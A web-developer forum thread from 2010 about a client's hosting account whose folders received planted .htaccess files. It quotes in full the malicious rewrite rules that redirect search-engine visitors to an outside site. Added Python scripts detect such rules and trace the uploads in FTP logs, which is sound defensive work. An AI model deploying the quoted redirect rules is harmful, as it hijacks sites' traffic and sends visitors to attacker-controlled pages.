monkeytooth, posted March 10, 2010

I have a slight issue. Sometime in the past week or so one of my clients' sites was hijacked. Someone managed to get a .htaccess file onto the server that pointed any referrals from search engines to another site.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://storyfold.info/go.php [R,L]

I know this isn't an exploit forum, but these sites are coded with PHP at its core. I have googled for exploits for the last 3 hours and I figured I would come here for some pointers or some ideas if someone else has experienced this recently. Things to know about the sites at hand: their main navigation logic is $_GET based, i.e. http://example.com/index.php?ref=var (side note: I check "ref" to see if it matches specific hard-coded static values; if they don't match it throws you back on the main page. It also checks to ensure it's a $_GET vs $_POST, _SESSION, _COOKIE). There are no forms on the site that would allow uploading of a file.

I'm just trying to look for ideas to prevent this from happening again. But I don't know where to look to find common examples of hacks, so to speak, so I can better build around them.
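The rules in the post have a recognisable shape: a stack of RewriteCond lines on %{HTTP_REFERER} feeding one RewriteRule whose substitution is an absolute URL on somebody else's host. The script below, an added example rather than anything posted in this thread, walks an account's directory tree, parses every .htaccess it finds, pairs each RewriteRule with the conditions that precede it (the way mod_rewrite does), and flags rules that redirect off-site. The two sample .htaccess bodies are constructed, and the redirect target in the malicious one is a placeholder host, not the one from the thread; `own_hosts` is an assumed parameter listing the domains that legitimately belong to the account.

```python
"""Scan a hosting tree for .htaccess files that redirect search-engine
referrals off-site, the pattern shown in the thread above.

Added example, not the poster's code. Sample rules below are constructed;
the redirect target is a placeholder, not the host from the thread."""
import os
import re
import tempfile
from urllib.parse import urlparse

# Constructed sample: the malicious shape (referer-gated, off-site target).
MALICIOUS_SAMPLE = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC]
RewriteRule .* http://attacker.example/go.php [R,L]
"""

# Constructed sample: a legitimate front-controller rewrite that stays on-site.
BENIGN_SAMPLE = """RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?ref=$1 [L,QSA]
"""

# RewriteCond TestString CondPattern [flags]  /  RewriteRule Pattern Substitution [flags]
COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def analyze_htaccess(text, own_hosts=()):
    """Return findings for one .htaccess body.

    Each RewriteRule is paired with the RewriteCond lines that precede it,
    which is how mod_rewrite groups them. A rule is flagged when its
    substitution is an absolute URL whose host is not in own_hosts."""
    own = {h.lower() for h in own_hosts}  # urlparse lowercases hostnames
    findings = []
    pending_conds = []
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            pending_conds.append((m.group(1), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), m.group(3) or ""
        conds, pending_conds = pending_conds, []  # conditions are consumed by this rule
        parsed = urlparse(target)
        if parsed.scheme in ("http", "https") and parsed.hostname not in own:
            flag_names = {f.strip().split("=")[0].upper() for f in flags.split(",") if f.strip()}
            findings.append({
                "target": target,
                "referer_gated": any(v.upper() == "%{HTTP_REFERER}" for v, _ in conds),
                "conditions": [pat for _, pat in conds],
                "external_redirect": "R" in flag_names,  # R or R=3xx: client-visible redirect
            })
    return findings


def scan_tree(root, own_hosts=()):
    """Walk root and return {path: findings} for every .htaccess that is flagged."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = analyze_htaccess(fh.read(), own_hosts)
        if findings:
            hits[path] = findings
    return hits


def demo():
    """Recreate the layout from the thread in a temp dir, plant the samples,
    scan, and return the flagged paths relative to the account root."""
    layout = {
        "": MALICIOUS_SAMPLE,
        "www": MALICIOUS_SAMPLE,
        "www/sites/site1": MALICIOUS_SAMPLE,
        "www/sites/site2": BENIGN_SAMPLE,  # legitimate rules, must not be flagged
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in layout.items():
            os.makedirs(os.path.join(root, rel), exist_ok=True)
            with open(os.path.join(root, rel, ".htaccess"), "w", encoding="utf-8") as fh:
                fh.write(body)
        hits = scan_tree(root)
        return sorted(os.path.relpath(p, root).replace(os.sep, "/") for p in hits)


if __name__ == "__main__":
    for path in demo():
        print("flagged:", path)
```

Run it against the account root with `scan_tree("/path/to/account", own_hosts=("example.com",))`; anything it reports that you did not write yourself is worth a look. It only understands mod_rewrite directives, so a `Redirect`/`RedirectMatch` to an external URL would need a similar check added.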
BRIK, posted March 10, 2010

Yikes - was this a well-known platform such as WordPress or something?
schilly, posted March 10, 2010

Yikes. That's rough. Did you have an .htaccess file beforehand? Did you check the FTP logs? SSH logs? It might not have been through the website.
monkeytooth (author), posted March 10, 2010

Well, I'm trying to get the hosting provider to provide me logs that date back to when I think it happened, because the logs I can access easily, I guess you can say, only date from today. This happened back on the 3rd, I believe. Only one of the 4 sites had an .htaccess file prior. I have the 4 sites on a single hosting account; whatever did it managed to access the root folders for all 4 sites and drop an .htaccess file in each root site folder, and the master root folder of them all.
schilly, posted March 10, 2010

Would the master root be outside the working dir of Apache, so there'd have to be SSH or FTP?
monkeytooth (author), posted March 10, 2010

Mine is:

root (.htaccess found)
root/www/ (.htaccess found)
root/www/sites/site1/ (.htaccess found)
root/www/sites/site2/ (.htaccess found)
root/www/sites/site3/ (.htaccess found)

All other folders on the server were fine, no .htaccess found. Digging through the files seeing if there are any files that I don't recognize, couldn't find one. It is a shared hosting service. But I couldn't back out far enough from the directories to even see any other users on the machine. And there's no known
schilly, posted March 10, 2010

That's definitely outside the Apache user's access, so I would say SSH attack. Looks as though they got root access too?
monkeytooth (author), posted March 10, 2010

Looks to me as such... well, the root of my entire hosting account. The top root folder I display in my half-arse diagram is where you can access the logs, tmp folder, and all else. I'm sure there's a "root" behind that as well that I can't access; that's part of the hosting company setup. But for the sake of all that is, yes, root was hit, then every folder that was considered as root for any one of the 4 sites hit also had the same files in them, but no other folders on the server in my hosting contained it. As if someone walked through the folders and figured out exactly which one is which. Another key thing I should mention is I am the only one outside of the hosting company itself that has access to this FTP (that I know of, unless someone brute forced it, but I think my hosting company would have caught that (hosting company is hostgator.com in this situation)).
schilly, posted March 10, 2010

Well, I'm assuming they're targeting websites and most sites are hosted inside a www dir, so all you really need to do is search for the www dir and post .htaccess files inside the folders in that dir. I think most servers are set up as /var/www/sites too. I'm assuming brute force through SSH for this, but I'm no expert. The logs would tell though. Definitely change all your passwords and make sure they are very strong.
mofoman, posted March 10, 2010

Hi, just to add my two cents, I came across the same issue yesterday with one of my client's sites (but not hosted on my servers). The server admin found that the culprit .htaccess files were uploaded via FTP, using the client's FTP account username and password. I believe it is likely a virus on the client's PC, or another PC that had access to the FTP details, captured the FTP credentials and either fed them back to a remote bot, or possibly the virus itself performed the uploading. We've seen this before in the last few weeks (although not with the .htaccess issue). I cannot say for sure at this time that the FTP details were captured by a virus, but we do know the .htaccess files were uploaded via FTP using a valid account. I would definitely update your FTP password (along with anything else), do a full virus scan, etc, etc. If I find any more info, I will pass it on here asap.
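The way mofoman's server admin settled the question was the FTP transfer log, which is also the answer to the "FTP logs?" question earlier in the thread. The script below is an added example, not code from anyone in this thread: it parses lines in the common xferlog format (the one written by wu-ftpd and proftpd), keeps only completed uploads of files named .htaccess, and groups them by source address and account so you can see whether the drops came from an address you recognise and whether they arrived in a scripted burst. The log lines are constructed for the example, the addresses are from documentation ranges, and `acctuser` is a made-up account name; `trusted_hosts` is an assumed parameter for the addresses you normally connect from.

```python
"""Pull .htaccess uploads out of an FTP transfer log (wu-ftpd/proftpd
xferlog format) and group them by source address and account, as a way to
check the stolen-FTP-credentials theory against the logs.

Added example, not the poster's code. The log lines are constructed; the
addresses are documentation ranges and the account name is made up."""
import os
from collections import defaultdict
from datetime import datetime

# Constructed xferlog sample. Field order follows xferlog(5): timestamp (5 tokens),
# transfer-time, remote-host, file-size, filename, transfer-type, special-action,
# direction (i = upload, o = download), access-mode, username, service,
# auth-method, authenticated-user-id, completion-status (c = complete).
SAMPLE_XFERLOG = """\
Tue Mar  2 14:02:33 2010 2 198.51.100.7 8820 /home/acct/www/sites/site1/index.php a _ i r acctuser ftp 0 * c
Tue Mar  2 14:05:10 2010 1 198.51.100.7 312 /home/acct/www/sites/site1/.htaccess a _ o r acctuser ftp 0 * c
Wed Mar  3 02:14:07 2010 1 203.0.113.45 1240 /home/acct/.htaccess a _ i r acctuser ftp 0 * c
Wed Mar  3 02:14:09 2010 1 203.0.113.45 1240 /home/acct/www/.htaccess a _ i r acctuser ftp 0 * c
Wed Mar  3 02:14:11 2010 1 203.0.113.45 1240 /home/acct/www/sites/site1/.htaccess a _ i r acctuser ftp 0 * c
"""

FIELDS = ("transfer_time", "remote_host", "file_size", "filename", "transfer_type",
          "special_action", "direction", "access_mode", "username", "service",
          "auth_method", "auth_user_id", "status")


def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines with the wrong field count are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 + len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts[5:]))
        rec["time"] = datetime.strptime(" ".join(parts[:5]), "%a %b %d %H:%M:%S %Y")
        records.append(rec)
    return records


def htaccess_uploads(records, trusted_hosts=(), burst_window=60):
    """Group completed .htaccess uploads by (remote_host, username).

    Each group records how many files were dropped and over how many seconds;
    several uploads within burst_window seconds look scripted rather than
    typed by hand, and a source not in trusted_hosts is what to chase first."""
    groups = defaultdict(list)
    for r in records:
        if (r["direction"] == "i" and r["status"] == "c"
                and os.path.basename(r["filename"]) == ".htaccess"):
            groups[(r["remote_host"], r["username"])].append(r)

    report = []
    for (host, user), recs in groups.items():
        recs.sort(key=lambda r: r["time"])
        span = (recs[-1]["time"] - recs[0]["time"]).total_seconds()
        report.append({
            "remote_host": host,
            "username": user,
            "trusted_source": host in trusted_hosts,
            "count": len(recs),
            "span_seconds": span,
            "burst": len(recs) >= 3 and span <= burst_window,
            "paths": [r["filename"] for r in recs],
        })
    # Untrusted sources first, then the busiest.
    report.sort(key=lambda g: (g["trusted_source"], -g["count"]))
    return report


if __name__ == "__main__":
    records = parse_xferlog(SAMPLE_XFERLOG)
    for g in htaccess_uploads(records, trusted_hosts=("198.51.100.7",)):
        print(g["remote_host"], g["username"], "uploads:", g["count"],
              "burst" if g["burst"] else "", "trusted" if g["trusted_source"] else "UNTRUSTED")
        for p in g["paths"]:
            print("   ", p)
```

In the constructed sample the download of site1/.htaccess from the trusted address is ignored (direction `o`), and the three uploads from the unknown address four seconds apart come out as one untrusted burst, which is the pattern you would expect from a harvested credential being used by a script rather than by a person in an FTP client. Feed it the real xferlog from the host (the one covering the 3rd, in monkeytooth's case) and compare the reported addresses with the ones you and the client actually use.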
monkeytooth (author), posted March 11, 2010

Thank you guys, very much. I'm glad to know it's not the coding on the site that was exploited. It's unfortunate that this possibility exists where a rogue machine could have swiped the details and then uploaded them to a harvester of some sort. I doubt, based on the layout and storage of the 4 sites that got hit, that it was any form of intelligent script, as all my folders contain index.html (or equivalent). The 4 sites are entirely different from one another; the only tying factor between them is the company, and that there were only 5 .htaccess files placed, key to the hosting: "root (or var)", "root/www", "root/www/sites/nameofsite1", "root/www/sites/nameofsite2", "root/www/sites/nameofsite3". I do agree, however, it could have been targeted. Ah well, it's not this PC; too many sites are linked to and maintained from this PC that would have shown similar if it were the case, and the other 84-93 sites would have been affected as well. Looks like I'm going to have to go to my client's office and set up shop and sweep their entire network and all the computers for anything that could have done this. Fun... Well, again, thank you guys; if you think of any more, please by all means provide it :-)